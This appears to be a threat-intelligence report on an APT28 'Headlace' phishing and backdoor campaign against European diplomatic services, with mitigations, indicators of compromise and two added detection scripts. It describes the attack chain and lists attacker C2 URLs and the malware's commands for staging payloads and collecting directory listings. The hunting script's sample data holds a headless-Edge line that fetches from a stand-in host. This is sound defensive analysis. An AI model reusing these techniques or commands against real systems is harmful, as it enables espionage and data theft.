Key Findings
APT28, a group linked to Russia's Military Intelligence (GRU), employed the "Headlace" backdoor as part of their attack, demonstrating their advanced capabilities in developing and deploying sophisticated malware designed to infiltrate and control targeted systems.
The attackers utilized legitimate Windows services as LOLBAS (Living Off the Land Binaries and Scripts) to conduct malicious activities while avoiding detection. This approach highlights the group's ability to blend in with legitimate operations and minimize forensic evidence.
The group weaponized legitimate web services for malicious purposes, showcasing their ability to exploit trusted platforms to carry out their attacks and evade network security measures.
APT28 used event tickets as a lure to deceive targets, highlighting their use of social engineering techniques to manipulate victims into executing the malicious payload.
The attack targeted multiple European nations, with possible focus on critical diplomatic institutions within the Vatican, the United Kingdom, Romania, and the European Union. This indicates a strategic interest in compromising high-value governmental and diplomatic entities.
The campaign underscores the persistent threat posed by nation-state-sponsored actors like APT28, who continue to evolve their tactics, techniques, and procedures (TTPs) to compromise critical infrastructure and entities on a global scale.
Executive Summary
This report uncovers a sophisticated cyberattack attributed to APT28, an advanced persistent threat group associated with Russia's Military Intelligence (GRU). APT28 employed a range of advanced and stealthy tactics, including the use of the "Headlace" backdoor, to infiltrate and compromise targets across Europe. The group demonstrated their technical prowess by utilizing legitimate web services for malicious purposes and launching legitimate Windows services as LOLBAS (Living Off the Land Binaries and Scripts), which enabled them to evade detection and leave minimal traces, and used tickets to an event as bait to lure victims into their trap.
The scope of the attack was extensive, with potential targets including diplomatic institutions within the Vatican, the United Kingdom, Romania, and the European Union. This campaign highlights the evolving nature of cyber threats and underscores the relentless efforts of nation-state-sponsored actors like APT28 to infiltrate and compromise critical entities.
Headlace Campaign
APT28 continues to deploy sophisticated cyberattacks to compromise high-value targets. One of their key tools is the HeadLace malware. First identified by CERT-UA, this custom malware is part of a complex execution chain designed to evade detection while executing malicious commands on the target system.
In their recent campaign, discovered in February this year, APT28 leveraged the HeadLace malware to infiltrate a set of victims. In a complex chain of execution, the payload, a Windows BAT script known as HeadLace, initiates a sophisticated attack sequence. It is capable of downloading and executing additional shell commands while leaving no traces.
The attackers initiated their campaign by distributing phishing emails with malicious URLs. These URLs lead to the legitimate service webhook.site, where the threat actors host their malicious scripts (hxxps://webhook[.]site/92a1c89c-c371-4b93-a91c-cb0d61b3432d).
The malicious script is the initial step in a more complex attack. It uses the search-ms protocol, designed to trick the user into thinking they are interacting with legitimate Windows functionality, while actually connecting to a remote server controlled by the attacker.
Figure.1 webhook[.]site script.
First, the script manipulates the browser's history using the pushState method. It changes the URL in the browser's address bar to https://webhook.site; however, it does not redirect the user to this site, it only alters the address bar URL.
Then the script redirects the user’s browser by using the search-ms protocol. The search-ms protocol is a Windows feature designed to facilitate and enhance local search operations on a user's device. By leveraging this protocol, the attacker can craft a specially formatted URL that, when executed, initiates a customized search on the user's system. This type of URL can be manipulated to display results that appear legitimate or trustworthy, thus deceiving the user into interacting with malicious files or triggering specific actions.
Figure.2 Prompt to execute search-ms protocol.
Figure.3 search-ms protocol performing local search.
The displayname parameter is used to set a custom display name for the search results in Windows Search. In the provided script, it is used to make the search results appear related to "diplomat.va" which could deceive users into trusting the results and potentially falling victim to malicious actions.
Attackers trick the user into opening or interacting with a search result that appears legitimate but is actually malicious. By using a remote address (hxxp://163.172.67[.]233:5000/bf58e609-e1ff-4d51-8e8c-b2182692bd37/Program%20Files%20(x86)/Microsoft/Edge/Application), the attacker tries to initiate a connection to a malicious server, which then delivers further payloads.
The further payload is the Headlace dropper. It is downloaded in a form of .cmd file from (hxxp://163.172.67[.]233:5000/bf58e609-e1ff-4d51-8e8c-b2182692bd37/bf58e609-e1ff-4d51-8e8c-b2182692bd37.cmd) and saved as 235148996.cmd.
Headlace description
The Headlace dropper's primary function is to write and execute a series of files that carry out malicious operations on the target system. It is designed to be stealthy, with multiple self-deleting mechanisms to remove traces of its presence.
Figure.4 Headlace dropper (.cmd) script.
The script creates and writes data to the following files in the %programdata% directory:
bf58e609-e1ff-4d51-8e8c-b2182692bd37.vbs (Headlace launcher),
bf58e609-e1ff-4d51-8e8c-b2182692bd37.bat (Headlace backdoor),
pvgzsqmsdt.tab,
vtcdlhjnfe.tsv.
Then it executes the created VBScript (bf58e609-e1ff-4d51-8e8c-b2182692bd37.vbs) and opens a legitimate-looking website with tickets to an event dedicated to the second anniversary of the war (https://www.eventbrite.co[.]uk/e/two-years-of-war-in-ukraine-tickets-795333964297) in Microsoft Edge. The event web page serves as a decoy to give a false sense of legitimacy and mislead the victim. Finally, the original batch file deletes itself to eliminate any evidence of its execution, making the operation more covert.
Figure.5 Event dedicated to the second anniversary of the war.
The VBScript (bf58e609-e1ff-4d51-8e8c-b2182692bd37.vbs) is designed to silently execute a batch file (bf58e609-e1ff-4d51-8e8c-b2182692bd37.bat) stored in the %programdata% directory and then delete itself from the system to remove traces of its execution.
Figure.6 Headlace launcher (.vbs) script.
The batch file is the Headlace backdoor, which sets up a continuous loop to execute malicious actions. It leverages Microsoft Edge in headless mode to fetch and execute additional payloads from a remote server, moves and renames files for further execution, and cleans up itself to avoid detection.
It starts a new instance of Microsoft Edge in headless mode (no user interface) and loads a base64-encoded HTML file directly into it. The base64 string contains the encoded HTML content that includes a script to fetch additional malicious code from a remote server (hxxp://163.172.67[.]233:5000/bf58e609-e1ff-4d51-8e8c-b2182692bd37/bf58e609-e1ff-4d51-8e8c-b2182692bd37.sxc). Running Edge in headless mode allows the script to execute without the user noticing. After that it moves any .sxc files in the Downloads directory to %programdata% and renames them with a .cmd extension (mmkyigmfrf.cmd). It then executes the moved and renamed .cmd script, which contains additional malicious instructions or payloads that will further compromise the system.
The continuous loop suggests that the script is designed to maintain persistence, repeatedly attempting to download and execute malicious code while removing any traceable artifacts.
Figure.7 Headlace backdoor (.bat) script.
The first instance of bf58e609-e1ff-4d51-8e8c-b2182692bd37.sxc that we intercepted gathers information from the user's system, particularly the contents of specific directories, and then uses a headless Edge to send the collected data to a remote server.
It lists the contents of the user's parent directory (%userprofile%\..), Desktop, and Downloads directory, then saves the output to a file named gqifynjifo.diff in the %programdata% directory. This effectively gathers information about files and directories in these locations.
It then combines three files: the gqifynjifo.diff file and the previously dropped pvgzsqmsdt.tab and vtcdlhjnfe.tsv files in the %programdata% directory, and saves the combined content into an HTML file named wzmqunhrht.html. The pvgzsqmsdt.tab and vtcdlhjnfe.tsv files contain portions of an HTML script that is completed by appending the gqifynjifo.diff file, which holds the directory listing. The HTML file therefore contains the extracted data and the remote server address (hxxp://163.172.67[.]233:5000/bf58e609-e1ff-4d51-8e8c-b2182692bd37/bf58e609-e1ff-4d51-8e8c-b2182692bd37.log) to which this data will be sent.
After that, it launches a new, headless instance of Microsoft Edge to load and execute the wzmqunhrht.html file, which sends the previously collected data to a remote server. After the data is sent, the script cleans up all the temporary files and artifacts to avoid detection.
Figure.8 Follow-on payload (.sxc) script.
Figure.9 Execution flow of Headlace attack.
Victimology
By tracking and analyzing malicious HTML attachments associated with this campaign, we have uncovered insights into the targeted entities. By examining the displayname parameter within search-ms protocol commands—used to set custom display names in Windows Search—we identified domain names specifically crafted to deceive users into trusting the search results, thereby increasing the likelihood of falling prey to malicious activities. The following domain names were extracted from the analyzed samples:
| Domain | Organization |
| --- | --- |
| eeas.europa.eu | The Diplomatic Service of the European Union |
| fco.gov.uk | Foreign & Commonwealth Office of the United Kingdom |
| mae.ro | Ministry of Foreign Affairs of Romania |
| diplomat.va | The Diplomatic Service of the Holy See |
These domains reveal a clear focus on high-value diplomatic institutions within Europe, which perfectly aligns with APT28's established pattern of targeting governmental and diplomatic entities. The selection of these specific targets is consistent with the scope of interests pursued by Russian military intelligence, reaffirming the sophisticated nature of this campaign and the threat it poses to European diplomatic stability.
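As an added example (not part of the original report or its tooling), the following Python script performs the kind of extraction the victimology section describes and the search-ms discussion above explains: it pulls search-ms: URIs out of an HTML lure, URL-decodes their parameters, and reports the displayname the user would see together with the host named in the crumb=location: parameter, so an analyst can tell a local search from one that is served by a remote share. The HTML samples and the 203.0.113.10 address are constructed for this example; the parameter names query, crumb and displayname are the standard search-ms parameters.

```python
# Added example, not from the original report: extract and analyze search-ms:
# URIs found in HTML lures. The samples below are constructed; 203.0.113.10 is
# an RFC 5737 documentation address, not a real indicator.
import re
from urllib.parse import unquote

SEARCH_MS_RE = re.compile(r"search-ms:[^\"'\s<>]+")
# A crumb of the form location:\\host\share (UNC) means the search is served
# by another machine; \\host@port\share is the WebDAV-over-HTTP spelling.
UNC_HOST_RE = re.compile(r"^location:\\\\([^\\/]+)", re.IGNORECASE)

# Constructed lure in the shape the report describes: pushState to a
# benign-looking URL, then a redirect to a search-ms: URI whose crumb points at
# a remote share and whose displayname impersonates a diplomatic domain.
LURE_HTML = """
<script>
history.pushState({}, "", "https://webhook.site");
window.location.href = "search-ms:query=Edge&crumb=location:%5C%5C203.0.113.10@5000%5Cshare%5CProgram%20Files%20(x86)%5CMicrosoft%5CEdge%5CApplication&displayname=diplomat.va";
</script>
"""

# Constructed benign page: a search that stays on the user's own disk.
BENIGN_HTML = '<a href="search-ms:query=report&crumb=location:C:%5CUsers%5Calice%5CDocuments&displayname=Documents">open</a>'


def parse_search_ms(uri):
    """Split a search-ms: URI into a dict of URL-decoded parameters."""
    params = {}
    for part in uri[len("search-ms:"):].split("&"):
        if "=" in part:
            key, value = part.split("=", 1)
            params[key.strip().lower()] = unquote(value)
    return params


def analyze_search_ms(uri):
    """Summarize what the user is shown and where the search really goes."""
    params = parse_search_ms(uri)
    crumb = params.get("crumb", "")
    location = crumb[len("location:"):] if crumb.lower().startswith("location:") else None
    host = port = None
    match = UNC_HOST_RE.match(crumb)
    if match:
        host = match.group(1)
        if "@" in host:  # \\host@port: WebDAV syntax, split the port off
            host, port_text = host.split("@", 1)
            port = int(port_text) if port_text.isdigit() else None
    return {
        "displayname": params.get("displayname"),
        "query": params.get("query"),
        "location": location,
        "host": host,
        "port": port,
        "remote": host is not None,  # UNC crumb: results come from another machine
    }


def extract_from_html(html):
    """Find every search-ms: URI in an HTML document and analyze each one."""
    return [analyze_search_ms(uri) for uri in SEARCH_MS_RE.findall(html)]


def collect_displaynames(samples):
    """Distinct displaynames across a set of lures, as used for the victimology table."""
    names = set()
    for html in samples:
        for hit in extract_from_html(html):
            if hit["displayname"]:
                names.add(hit["displayname"])
    return sorted(names)


if __name__ == "__main__":
    for hit in extract_from_html(LURE_HTML) + extract_from_html(BENIGN_HTML):
        print(hit)
```

Run over a directory of captured HTML attachments, collect_displaynames gives the list of impersonated domains, and the "remote" flag plus "host" on each hit separates lures that reach out to attacker infrastructure from ordinary local searches.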
Figure.10 Map of targeted countries.
Mitigations
Given the sophisticated nature of the Headlace campaign, a multi-layered approach is crucial to mitigate the impact and detect ongoing or previous compromises. Below are the recommended mitigations and threat hunting strategies:
Mitigation Strategies
Enforce URL filtering at the email gateway to block access to known malicious domains, such as those involving phishing attempts or C2 infrastructure. This should include URLs that may appear in malicious email attachments or embedded within HTML files.
Restrict or monitor the execution of scripts (e.g., BAT, VBS, and PowerShell) from staging directories such as %programdata%. Use application whitelisting to block unauthorized scripts and executables.
Disable or monitor the usage of headless browsing modes (--headless) in browsers like Microsoft Edge, as these are often used for malicious activities without user interaction.
Implement and regularly update IDS/IPS signatures to detect network traffic patterns associated with the Headlace campaign, such as communications with known C2 servers (e.g., 163.172.67[.]233).
Ensure proper network segmentation to minimize the lateral movement of attackers within the environment, limiting potential damage from any compromised endpoints.
Threat Hunting Recommendations
Conduct a thorough search of your organization's email archives for any references to webhook.site in both the body of emails and within attachments.
Search for connections or references to the URL hxxps://www.eventbrite.co[.]uk/e/two-years-of-war-in-ukraine-tickets-795333964297. This legitimate URL is utilized to lure victims.
Monitor and analyze historical and real-time network traffic for any connections to the C2 server 163.172.67[.]233. This IP address is directly associated with the Headlace command-and-control infrastructure.
Search endpoint logs, command history, and process execution data for instances of the msedge browser running in headless mode, indicated by the command "msedge --headless=new". This is a key indicator of the Headlace malware's activity, as it utilizes this feature to execute scripts silently.
Search for execution of batch files (.bat), Visual Basic scripts (.vbs), and command scripts (.cmd) in directories such as %programdata%.
Track and log file deletion events, especially those involving temporary files used by malware to execute commands or exfiltrate data. This includes files with extensions .tab, .tsv, .diff.
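As an added example (not the report's own tooling), here is a Python hunt that applies the recommendations above to process-creation telemetry: it flags msedge started with --headless, script files executed from %programdata%, the move of *.sxc downloads to a .cmd name, and directory listings redirected into %programdata%, and for a headless Edge launch it decodes any base64 data:text/html argument on the command line to recover the URLs embedded in it. The event records, their field names (Image, CommandLine, ParentImage, in the style of Sysmon event 1) and the 203.0.113.10 host are constructed for the example.

```python
# Added example, not from the original report: hunting rules for the Headlace
# behaviours over constructed process-creation records. Field names follow
# Sysmon event 1 (Image, CommandLine, ParentImage); 203.0.113.10 is an RFC 5737
# documentation address, not a real indicator.
import base64
import re

# Constructed HTML stub that the sample headless-Edge command line carries as a
# base64 data: URI (the report describes Edge being handed such a document).
_STUB_HTML = '<html><script>location="http://203.0.113.10:5000/stage2.sxc"</script></html>'
_STUB_B64 = base64.b64encode(_STUB_HTML.encode()).decode()

SAMPLE_EVENTS = [
    {"Image": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": f'msedge --headless=new --disable-gpu "data:text/html;base64,{_STUB_B64}"'},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cmd /c move /y "%userprofile%\Downloads\*.sxc" "%programdata%\mmkyigmfrf.cmd"'},
    {"Image": r"C:\Windows\System32\wscript.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'wscript.exe "C:\ProgramData\bf58e609-e1ff-4d51-8e8c-b2182692bd37.vbs"'},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cmd /c (dir "%userprofile%\..")>"%programdata%\gqifynjifo.diff"'},
    # Benign activity that must not fire: a user-launched browser and a plain dir.
    {"Image": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "msedge https://www.example.com/"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"cmd /c dir C:\Users\alice\Documents"},
]

DATA_URI_RE = re.compile(r"data:text/html;base64,([A-Za-z0-9+/=]+)", re.I)
URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.I)
# A .bat/.cmd/.vbs/.ps1 path under %programdata% or \ProgramData\ on the command line.
PROGRAMDATA_SCRIPT_RE = re.compile(r"(%programdata%|\\ProgramData\\)[^\"\s]*\.(bat|cmd|vbs|ps1)\b", re.I)
# "move ... *.sxc ... something.cmd": the rename step of the backdoor loop.
SXC_RENAME_RE = re.compile(r"\bmove\b.*\*\.sxc.*\.cmd\b", re.I)
# A dir listing redirected into %programdata% (the collection step).
DIR_REDIRECT_RE = re.compile(r"\bdir\b.*>\s*\"?%programdata%", re.I)


def embedded_urls(cmdline):
    """Decode base64 data:text/html arguments and return the URLs found inside."""
    urls = []
    for blob in DATA_URI_RE.findall(cmdline):
        try:
            html = base64.b64decode(blob, validate=True).decode("utf-8", "replace")
        except ValueError:  # binascii.Error is a ValueError: malformed base64
            continue
        urls.extend(URL_RE.findall(html))
    return urls


def hunt(events):
    """Run the hunting rules over process-creation records and return findings."""
    findings = []
    for ev in events:
        image = ev.get("Image", "").lower()
        cmd = ev.get("CommandLine", "")
        if image.endswith("msedge.exe") and "--headless" in cmd.lower():
            findings.append({"rule": "headless_edge",
                             "parent": ev.get("ParentImage", ""),
                             "urls": embedded_urls(cmd), "cmd": cmd})
        if PROGRAMDATA_SCRIPT_RE.search(cmd):
            findings.append({"rule": "script_in_programdata", "cmd": cmd})
        if SXC_RENAME_RE.search(cmd):
            findings.append({"rule": "sxc_renamed_to_cmd", "cmd": cmd})
        if DIR_REDIRECT_RE.search(cmd):
            findings.append({"rule": "dir_listing_to_programdata", "cmd": cmd})
    return findings


if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(finding["rule"], finding.get("urls", ""), finding["cmd"][:80])
```

In a real hunt the decoded URLs and the parent process of the headless Edge launch are what you compare against the IoC list at the end of this report; a headless browser spawned by cmd.exe or wscript.exe rather than by the user's shell is the combination worth escalating.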
Outlook
The campaign orchestrated by APT28, as revealed in this report, underscores the persistent and evolving nature of nation-state-sponsored cyber threats. APT28’s use of advanced tactics, such as the "Headlace" backdoor and LOLBAS techniques, demonstrates a significant escalation in their capabilities and their commitment to conducting sophisticated, high-impact operations with a focus on critical targets across Europe.
Moving forward, we anticipate that APT28 and similar advanced threat groups will continue to refine their methods, leveraging both legitimate and custom-built tools to evade detection and increase the stealth of their operations. Their use of LOLBAS and exploitation of legitimate web services for malicious purposes is likely to become more common, presenting ongoing challenges for traditional security defenses.
Organizations, particularly those in sectors of strategic interest such as government, diplomatic missions, and international institutions, must remain vigilant and proactive in their cybersecurity posture. The trend toward LOLBAS malware and the use of legitimate infrastructure for malicious activities necessitates the adoption of more sophisticated threat detection and response mechanisms.
Moreover, as geopolitical tensions persist, the frequency and intensity of such nation-state-sponsored campaigns are expected to increase. Therefore, it is critical for organizations to continuously adapt their security strategies, focusing on enhancing their resilience against highly targeted cyber operations.
Indicators of Compromise
Network:
IP: 163.172.67[.]233
URL: https://webhook[.]site/92a1c89c-c371-4b93-a91c-cb0d61b3432d
(webhook[.]site is the legitimate service)
URL: http://163.172.67[.]233:5000/bf58e609-e1ff-4d51-8e8c-b2182692bd37
URL: http://163.172.67[.]233:5000/bf58e609-e1ff-4d51-8e8c-b2182692bd37/Program%20Files%20(x86)/Microsoft/Edge/Application
URL: http://163.172.67[.]233:5000/bf58e609-e1ff-4d51-8e8c-b2182692bd37/bf58e609-e1ff-4d51-8e8c-b2182692bd37.cmd
URL: http://163.172.67[.]233:5000/bf58e609-e1ff-4d51-8e8c-b2182692bd37/bf58e609-e1ff-4d51-8e8c-b2182692bd37.log
URL: http://163.172.67[.]233:5000/bf58e609-e1ff-4d51-8e8c-b2182692bd37/bf58e609-e1ff-4d51-8e8c-b2182692bd37.sxc
URL: https://www.eventbrite.co[.]uk/e/two-years-of-war-in-ukraine-tickets-795333964297 (legitimate website, which is used as lure)
Host:
Name: 235148996.cmd (Headlace dropper)
MD5: E0791B209BC10A3137F98822C3179214
SHA-1: 1641E9BBA12E351BB35764AFE90A3C7F833C9B14
SHA-256: 08E29315129CAE53261627C414AEB91409237CC36C00DBB2E42BE6DB76D02C97
Name: bf58e609-e1ff-4d51-8e8c-b2182692bd37.vbs (Headlace launcher)
MD5: 703AC419FFC98974D35597716EA37DE9
SHA-1: 86C2428D76C0785BD1117A4BF4CB1F4A4AFAC96A
SHA-256: D5B66A8EA8D76BC4276CCC1395E14A7572F465EABFE3C1F326B608B809871B45
Name: bf58e609-e1ff-4d51-8e8c-b2182692bd37.bat (Headlace backdoor)
MD5: 3B45F55D3415865B0E4C7E126144A8E3
SHA-1: 4370EF2B100F3D74FE12734638F182FA4C4F1F8B
SHA-256: 8DA0019F8524E91057956806BB2412D8673F25E282FAC7F8B4DC2F6631CAA716
Name: pvgzsqmsdt.tab
MD5: DAD75FDEEA57B6D940D095B97222B43E
SHA-1: E663DB0E919A96942D9C077E565326B4770FF84E
SHA-256: 90DDB959B8468502E76DEDFBB4F8771474F7719081EAF1657CAECD971991B25F
Name: vtcdlhjnfe.tsv
MD5: E37265FDFD13FD94F69088F6056D4159
SHA-1: C2A78A88DFB53DF44A530035193315A1251514D4
SHA-256: 9E1DAC07C2DBEB4817259E5656DCDFB96E3D9E6C59D6E0A3E6D1818E810F6980
Name: bf58e609-e1ff-4d51-8e8c-b2182692bd37.sxc
MD5: CF3AEE363E0574338F969F8A8CF0A02C
SHA-1: 14D27B7E6E87CB25781C69EE766E1B66A012BCBD
SHA-256: 428E5310A78F42E798C3B67F71F4B87C11A822B1AE56A7F4997B0796024BC344
Other discovered samples:
URL: https://webhook[.]site/f03eb06b-5aad-4e29-bf5c-97f56f9d833f
MD5: 54fd51c3bb6f5c65e27f83755a6f2ae4
SHA-1: 123b31844fdd42d289dead3d890aa39f7f386404
SHA-256: aef94d2451e1eb943d2b1ee5ed48d923ffff4baeb0d26ebe4450d6e151bf28c8
URL: https://webhook[.]site/d48744f9-e00f-45e9-9304-c9227be811e1
MD5: cf2c8ed700c9f25e977d0dea7e84719a
SHA-1: b7ef03e718caf274a18735bb7cf021dce4215f0a
SHA-256: 7bed81cbbc5d368beb4531a373bad5a38aef7947f565048ad4ba597a821897c6
URL: https://webhook[.]site/7e385057-012f-4436-816a-732d621fad52
MD5: 232bcf77eaddea1243a976366d259fe8
SHA-1: 1af358e6a1d3663990b9092b7d3e9ea447f8d39b
SHA-256: ca5dd056e948b1d25bda3a96a0bc6001e20ef20c9516c86718e41817943400fa
Commands:
start "" msedge --headless=new --disable-gpu
move /y "%userprofile%\Downloads\*.sxc" "%programdata%\mmkyigmfrf.cmd"
(dir "%userprofile%\.." & dir "%userprofile%\Desktop" & dir "%userprofile%\Downloads")>"%programdata%\gqifynjifo.diff"